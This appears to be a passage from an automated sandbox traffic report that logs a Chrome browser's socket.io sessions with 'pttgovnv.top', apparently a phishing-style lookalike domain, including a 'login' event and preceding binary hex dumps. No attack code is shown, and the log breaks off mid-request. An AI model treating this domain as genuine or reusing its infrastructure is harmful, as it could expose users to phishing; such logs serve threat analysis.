5a 7b 09 21 e2 06 82 b0 e1 4b 27 3e eb c4 4b 12 b9 a0 8a c4 f9 c4 cb 2f 08 1d 30 32
          Data Ascii: "q@ "q@ D@ D@ D@ @ @ @ @ #@ #@ #@ G @ G @ G @$@ @$@ @$@ @$@ aoQ#& {{r@9hAZ{!K'>K/02
          2024-09-01 22:25:29 UTC1369INData Raw: 3b bb ba 42 0d 5e af 97 bd fc 32 e5 db 61 c0 f6 a0 5f 51 64 68 4c 5a 88 26 97 60 f8 90 fe 8f f5 f9 fd f0 f1 e6 2d 5b b6 6e ff fc 61 d1 64 82 b0 26 8e 30 0c 50 f9 97 45 9a 4d 23 7d ce 8c e2 a5 0e 26 40 ad dc e4 f3 cf 3c fd f2 49 93 4a 72 4a cb ca db b0 b1 ac bc fc 2b 36 88 3b 02 00 87 d8 c7 0e 50 4c 9c 08 9e f3 4f 25 04 52 2b e6 57 cd 37 3a d5 ed e1 ff 4b 9f b6 c8 b4 33 78 6d d4 c4 f1 24 d2 59 69 a9 67 9d 7c d2 ca 8c c2 a2 7c f4 d7 bc 71 db 67 db 73 79 7b 56 f6 fc 0d 1b 3f f9 75 69 45 d5 26 f1 5d bf fc dd 64 52 25 10 08 44 e2 08 c7 2a 79 93 8b 64 dc 8e dd 7b 5e 79 ea 99 17 66 63 c3 89 8b 17 9e 3a 63 fa 54 7b 42 82 a3 5f 13 29 b6 7b 7c 8a df 78 52 52 62 bf 81 0d 83 ba 21 76 0e ab d5 0a 67 9c 7a ca 89 8c c4 15 89 e6 03 10 36 a5 12 91 8b 1d 69 03 08 d7 c1 55
          Data Ascii: ;B^2a_QdhLZ&`-[nad&0PEM#}&@<IJrJ+6;PLO%R+W7:K3xm$Yig||qgsy{V?uiE&]dR%D*yd{^yfc:cT{B_){|xRRb!vgz6iU
          2024-09-01 22:25:29 UTC1369INData Raw: db 57 5d 7a eb 5f 1e 7f f2 7b 42 7e e2 54 32 84 da 15 bf 48 fe 1b e9 e7 24 7d 9d d4 b9 e9 7c e2 85 1a 95 d0 f3 43 d2 36 26 e5 bf af 48 6b 75 04 76 50 f5 ff ea b1 57 47 6a 47 e6 32 d4 aa 9e 25 f4 21 86 25 0b e6 5d ba 70 de dc b5 b9 79 39 13 ea 1b 9b aa b1 cd 6c 36 27 bc f2 ca eb bf d9 b1 7b ef b3 a0 b8 28 a8 b5 80 a4 8d 23 10 89 23 c4 74 92 d3 c0 e1 65 93 f8 a4 e6 0f f8 5d 2e b7 1b 99 95 d2 aa 32 9b 62 3a 92 f4 b4 54 a5 39 46 0b bb 9e 2d e0 e8 f4 de d2 d6 0e 56 8b 85 df df 85 e7 9c 75 f1 81 83 07 0f 54 d5 36 fc 83 7d b4 ab 0e d7 08 d2 89 19 f8 fd 34 29 f6 1a 57 19 69 aa f6 db b1 8a 3e b3 3b 6c 36 6e 66 bc f2 b2 8b be bb 64 d1 c2 49 13 0a 0b 19 71 d3 72 ff 36 ce e0 c5 3b fa 9d 05 d8 1a d6 d4 ac 10 aa 8c f4 34 ee b7 36 9c 81 4e e8 7e e9 f1 7a 38 91 93 84 ed
          Data Ascii: W]z_{B~T2H$}|C6&HkuvPWGjG2%!%]py9l6'{(##te].2b:T9F-VuT6}4)Wi>;l6nfdIqr6;46N~z8
          2024-09-01 22:25:29 UTC1369INData Raw: 3f b9 f3 72 6f c0 bf 41 c8 99 d4 d0 78 68 01 1e 13 cf 86 d4 42 9b 05 79 93 24 ce 76 c9 05 e7 fe fe ba 6b af 59 da dc da a2 b0 a9 fa 46 df fa 8f 36 6e 79 f7 fd f5 6f 7f ed fc 73 be 73 e5 e5 5f cf e1 1a 0b 26 77 98 aa 86 91 2f 65 3e 0b 2a 72 e3 f5 7b b9 2c 74 b2 cd 67 55 6d 2d 18 0d 8a 15 62 62 71 51 bf f7 63 66 9b 9f 3a 26 6f 7f 7d fc 89 4f f1 f3 b6 cf b6 bf 58 56 59 fd 5f f6 67 93 98 97 5c aa 39 cb 2b e6 ad 71 37 67 11 c6 86 d6 86 40 20 10 08 04 02 81 70 8c 81 34 71 e3 6f b7 2a ab 34 20 8c cb 97 2c b8 a6 b0 a0 60 f5 84 a2 42 6e 3b 5a 7e e2 e2 ac a4 a4 04 f0 fb fc 7c 57 aa 1e 7f d4 92 35 b7 b4 72 4d 9a 41 f8 80 18 0c 7a 88 b7 c5 f3 6a 0b 01 bf 1f 8c 46 a3 54 a2 f4 d2 da 48 33 5e 55 55 35 24 26 26 f0 04 af 01 a1 4d 09 88 6b a0 c6 c4 e5 72 41 5b bb e2 8a 92
          Data Ascii: ?roAxhBy$vkYF6nyoss_&w/e>*r{,tgUm-bbqQcf:&o}OXVY_g\9+q7g@ p4qo*4 ,`Bn;Z~|W5rMAzjFTH3^UU5$&&MkrA[
          2024-09-01 22:25:29 UTC1369INData Raw: 7d bc e1 b5 d7 df 7e a9 a5 a3 e3 63 d6 d4 a6 22 43 66 f1 fb dd aa 1d b0 4f f5 f2 47 92 3b b1 30 07 55 93 2a f4 51 a6 29 52 eb 12 1c 8a d6 a5 0f 13 91 4c ff a2 8e 42 4d 4c 4d 4c 3a e9 8c d3 d7 9c bb 7a e5 f2 45 b3 67 4e 57 18 85 cb 75 58 59 2c 24 d1 d9 d9 59 50 55 53 c3 83 4a 30 58 24 72 dc 70 7c 3a da 79 20 1e 2f a9 96 c8 fb 3f c8 b5 a2 6a 92 a6 65 63 1e 67 b1 30 72 de 3d 32 42 cb ae 87 e9 66 d2 d3 53 b9 09 8c 0f 4e 14 26 61 24 7f 6a 93 2f 96 e7 42 12 5a 57 df 00 71 a2 8c 17 9a 68 a3 25 83 b2 d4 dc b4 a9 53 4e dc b8 e5 b3 a7 40 29 ab 24 37 0a fe 08 f2 26 e7 4d 9d 4a 2e 7c aa 77 be 99 90 64 6e 34 37 0b c7 d0 dc 15 e9 4a a0 57 3d 1b 56 55 fb f4 b5 a7 ac be f6 dc 73 d6 2e e3 9a b8 a2 c2 90 06 37 66 bb 60 8d 26 44 fe 71 53 83 f3 96 ac 25 3c 10 30 9d 0f 26 d5
          Data Ascii: }~c"CfOG;0U*Q)RLBMLML:zEgNWuXY,$YPUSJ0X$rp|:y /?jecg0r=2BfSN&a$j/BZWqh%SN@)$7&MJ.|wdn47JW=VUs.7f`&DqS%<0&
          2024-09-01 22:25:29 UTC1369INData Raw: a4 17 65 01 cb ba 61 90 02 ff 5d da c1 1b 19 d0 df 10 b3 f4 df f1 3f 37 5f 8f 9f 9f 78 fa 85 dc f7 3e dc f0 88 20 64 38 d6 b3 b1 fd a2 0b ce fb c9 c2 f9 f3 b8 ec 9e 71 c6 29 cb 4b cb ca af c1 f6 ff bc bb ee 9d e7 5e 7a ed 41 f6 27 9a f9 ed aa 8d 00 7e d7 13 29 13 7d f8 5f f6 12 f5 91 24 7d aa fb d0 46 6c 0c 41 e5 3b 7a d4 fe a0 7d 9c 5f 3e 0b 32 8d 8e 5c 8b b2 56 2d 5d f4 75 9b cd 9e 3a 6d ea e4 c5 27 cc 9d 95 ab 90 f5 5c fe 5c 68 23 c6 b5 3f 57 91 c1 02 e5 07 e5 cb cd c8 3c 06 76 21 12 1c f6 a8 fd e1 a4 3c 57 d6 54 f3 1a d1 5e af f2 ec d8 d9 b9 30 72 b5 b9 a9 d5 ea b0 5a 57 b7 77 77 3f a3 92 89 b8 c8 39 02 dd 39 88 c8 11 88 c4 1d 5f e4 4d 8e a3 9c 0c 4d 92 80 e4 65 67 5e 3c 63 c6 f4 1c d4 5a f8 fa 20 43 e8 1f 25 35 70 b8 f8 0d 56 43 26 27 2e 7c c9 b9 14
          Data Ascii: ea]?7_x> d8q)K^zA'~)}_$}FlA;z}_>2\V-]u:m'\\h#?W<v!<WT^0rZWww?99_MMeg^<cZ C%5pVC&'.|
          2024-09-01 22:25:29 UTC1369INData Raw: 74 4c 9f 54 72 c2 95 97 5d fc 03 ae a1 98 58 6c d9 ba 7d 67 d3 2f 7e fd c0 d7 41 89 ce 52 a7 f5 c0 89 3c d9 a4 37 14 5f fa f5 0b f8 7d 7f ed bc 73 16 e1 04 99 90 e0 08 e5 6c e2 ac 88 4d 80 d8 8e 0b 7c 57 77 0f 34 35 2a 7e 27 98 78 58 27 c8 4a ff 93 ad 56 ec ae 03 21 12 a4 e1 e6 3c e5 fc 95 55 35 3c c7 18 6a 74 14 73 ad 26 f4 3b fd 6c 31 a9 ad ad 65 8b ba 99 a7 c3 e0 c4 b1 a3 93 4d da 4d d0 d8 d8 0c 4d cd 2d 3c e2 6c fd 87 1b fe f3 df f5 1f fd 5b 68 e9 5c 2a ad 8b 5c d4 e2 c4 58 71 a6 31 6d 72 c9 8a 6f 5f 75 d9 b7 57 30 92 28 f3 ef 0d 76 f1 a8 ad ab e3 c4 06 ab 6a 0c 96 b4 e0 39 1a 45 1f 22 50 0b d1 1f e1 8f 15 81 d3 1b 14 1f 3d 4e 92 d8 a2 86 c4 4c 4d ca 94 71 f6 03 d6 c1 94 69 66 94 f1 d2 32 a2 9e 79 d8 fd 29 e3 a4 90 72 f4 ff 93 e4 36 16 2e 01 38 68 a8
          Data Ascii: tLTr]Xl}g/~AR<7_}slM|Ww45*~'xX'JV!<U5<jts&;l1eMMM-<l[h\*\Xq1mro_uW0(vj9E"P=NLMqif2y)r6.8h
          2024-09-01 22:25:29 UTC1369INData Raw: 20 22 65 6b 58 7f a2 b9 34 3d 35 b5 d7 6f 1d 0e c2 39 14 e0 ef c4 d4 17 98 a6 22 25 49 49 eb 82 66 7a ac 4e 52 5e 5e 05 07 4b cb f8 6e e2 d5 d7 df 7a f1 e3 2d 5b 9f 47 62 b4 74 d1 fc 9b d9 b3 7b 29 97 15 7b 3c bc f1 f6 7f 6a fe f7 be df 9f 09 bd eb 03 ab 7d ea d4 25 9b d4 e6 4b 35 89 33 40 38 fa 53 76 32 3a 15 2c 5e b3 6a d9 e9 b5 75 0d 8d 89 09 76 3e 7f ac 5c b9 ec f4 89 45 13 32 bf da b7 bf ae a9 a9 b9 ed c2 0b ce e1 9b af 54 76 ff 1a 9d 92 2e e3 97 f7 3d f8 e6 d6 ad 3b 5e e7 8c af a4 68 1a 3b ae 82 91 8f 03 a0 94 93 f2 a9 88 63 8f ea da f2 fe f0 c1 59 72 f3 75 d7 fe 92 3d ab 7c 03 83 2e 11 f8 ec 49 72 1f ed 3a 84 f2 2a 37 3c 28 af 98 3a 27 da 8d 07 8e 0d 12 b8 2e 36 27 60 3a 1a 2c f7 86 48 66 9b 17 7c 06 91 40 a2 5b 45 8a 48 62 6e e5 b5 a1 03 7d 12 b8
          Data Ascii: "ekX4=5o9"%IIfzNR^^Knz-[Gbt{){<j}%K53@8Sv2:,^juv>\E2Tv.=;^h;cYru=|.Ir:*7<(:'.6'`:,Hf|@[EHbn}
          2024-09-01 22:25:29 UTC1369INData Raw: 1f 54 08 5b 68 b3 86 39 2d 75 7a 88 67 9b 13 9d 90 69 dc e4 36 b2 31 63 5b 04 3e 4f 0e 35 d1 30 6a 9a 9f 78 ea b9 3d 0f 3d f2 97 8b 44 53 8b 8a c4 51 70 03 61 e0 79 8b ba 80 40 20 10 08 04 02 e1 d8 03 25 fb 3d 36 21 b5 5a 7c d7 ad 67 40 8d 04 6a d3 74 3a c5 bc 26 0f 0a 6d cf 85 99 55 49 ad a1 e1 7e 5b d5 6c b7 8f 99 d0 e5 0e 53 c9 97 54 cd cd 7b 49 42 fb e3 e7 c5 c5 f5 60 64 bb de 0f 3e 7c 2f f0 d4 73 ff 7e 50 9c b2 52 68 c4 ba 20 ec 6c 0d 42 53 16 84 c3 4b 5a f5 99 1a 41 b4 c9 e4 a1 f2 78 b4 b5 78 20 ac a1 53 3b 49 1b c4 ff 7b 9f 7d e1 25 6e 82 f8 c6 c5 17 fc ea e5 57 de 7c e5 99 e7 5e 4a fe d3 c3 0f f2 84 ac 19 e9 a9 a0 63 f7 6d b7 c7 1f 55 d2 d7 d0 2e 47 a6 23 e0 da 2e 0d 44 63 fe c3 eb d5 d7 37 86 32 bf a3 16 a2 bf cc ef 5c f3 21 aa 58 48 0d 08 96 15
          Data Ascii: T[h9-uzgi61c[>O50jx==DSQpay@ %=6!Z|g@jt:&mUI~[lST{IB`d>|/s~PRh lBSKZAxx S;I{}%nW|^JcmU.G#.Dc72\!XH


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          114192.168.2.449859172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:30 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liNOP&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 2
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:30 UTC2OUTData Raw: 34 30
          Data Ascii: 40
          2024-09-01 22:25:30 UTC614INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:30 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPWj8XA9U%2B%2FWLa0RQxulskt5G4MZ2yBp9kX3PER4Ost315FwocfAuAbmOtTANdAw397ENRpG6rLfKmG%2Fe2KwnIXJATEA99rnDw3huPItxjPkxvynO38%2BiKrxfQfVbwc%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad35dfae32e8-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:30 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          115192.168.2.449860172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:30 UTC549OUTGET /socket.io/?EIO=4&transport=websocket&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: Upgrade
          Pragma: no-cache
          Cache-Control: no-cache
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Upgrade: websocket
          Origin: https://pttgovnv.top
          Sec-WebSocket-Version: 13
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Sec-WebSocket-Key: 1mo1WLcM7ledEiy756S9NA==
          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          2024-09-01 22:25:30 UTC615INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:30 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FmZqADDsfXzY8LpO7R2BbkzoDSwuMrfcU%2FT2u1ScKetuFTJFv%2F%2BSl7Y4%2BNkc5R4OV0%2BAHZNEUJZrYM2ZZAzWo61%2FtMEsN9%2BKVctezfvDK9FtY5UvAKD%2BIrQEUOSUZs%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad35fc2f32d0-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:30 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
          Data Ascii: 22{"code":3,"message":"Bad request"}
          2024-09-01 22:25:30 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          116192.168.2.449861172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:30 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNOR&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:30 UTC620INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:30 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 32
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JOCoucicsv0dNXEjKQFoVkbY4ETNCf4RAfB2LmOaPVKqXuqDFweEVNwEBtRlgMpkWmJ3MZ8riIo5oQSqGlRZfpx%2Fcugnd9ymRCKJi%2BNHbz2UgvBrkKEJ7%2FIAnGuG9WM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad361947422d-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:30 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 6a 31 33 5a 63 54 57 58 67 53 69 4d 50 72 33 35 42 51 55 4a 22 7d
          Data Ascii: 40{"sid":"j13ZcTWXgSiMPr35BQUJ"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          117192.168.2.449862104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:30 UTC380OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNBO HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:30 UTC631INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:30 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2B%2Fl8%2FB%2FVA1goQ%2BFA73L456mkS7SqjvJSG4Lcfpd08xjbVxgN5F3Vu8ajdO%2FTy2tDHfkQt0KssV%2BoDXvXd6jeeefx4HTcrZJNbNIH2cAiND%2BjKPYAkfP7v7Z2G6ABgo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad370fc9c46b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:30 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 38 35 69 68 37 78 61 42 41 77 67 37 66 31 4b 4e 42 51 55 4b 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"85ih7xaBAwg7f1KNBQUK","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          118192.168.2.449863104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:31 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNOP&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:31 UTC569INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:31 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwr0BBQcDqyyaaRPzaGsvVRTi14Ux76NaPF6wuyYNTdgdNcos9JJgmDABUKBkRrw0BlmM6%2BgZ0ecwkx0cx2Z%2Bw5uG1ubafIki0PkAAehWBeH3GU8GqQpO8G8LswLgRQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad3a8bafc345-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:31 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          119192.168.2.449864172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:31 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liNak&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 49
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:31 UTC49OUTData Raw: 34 32 34 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 5b 22 75 73 65 72 22 5d 5d
          Data Ascii: 424["login","user-f3U2DoJjZHCPecWkBQUD",["user"]]
          2024-09-01 22:25:31 UTC609INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:31 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NWweQvNou%2Fr6Ba0unpOOCzfKmidTjJsp3eUYkJ7nmV7diqX9FQpQLPrXwk9hKMYOBL61NiYKv3nEw0NLy0zvu%2BjZvesNpCqDZqzb%2FFn%2BluCARokiHHJ0dz%2FNL2%2FogaY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad3aca404265-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:31 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:31 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          120192.168.2.449865172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:31 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:31 UTC623INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:31 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 1
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOnDN1t9DJMJ7ZNagCsndK7%2FigSCbX2PK5eFiDyuG1DUl2pDzK3M7SAjGdKPO2tPbYApGoIYvuEp%2FJX7yKhzIdMYFBod3Nd%2BC%2BmCbQYGLtxK7Qdo2qg27TMfJo%2BV6Y8%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad3ad87072a7-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:31 UTC1INData Raw: 31
          Data Ascii: 1


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          121192.168.2.449866104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:31 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNOR&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:31 UTC607INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:31 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pDJByy%2Fs%2BD8mYwo%2FvpQg0YNh8Uu9SId3rBkIa0EUMCELtNUuk8o9lGNl%2BeU0lGQiQZZ8EHspNx9VIpF7nlfpmg5dltmYjUe21PgxvUvN9geTHjKgNT5KyR%2BCfeGXF8%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad3afd5078e8-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:31 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
          Data Ascii: 29{"code":1,"message":"Session ID unknown"}
          2024-09-01 22:25:31 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          122192.168.2.449867104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:33 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUI HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
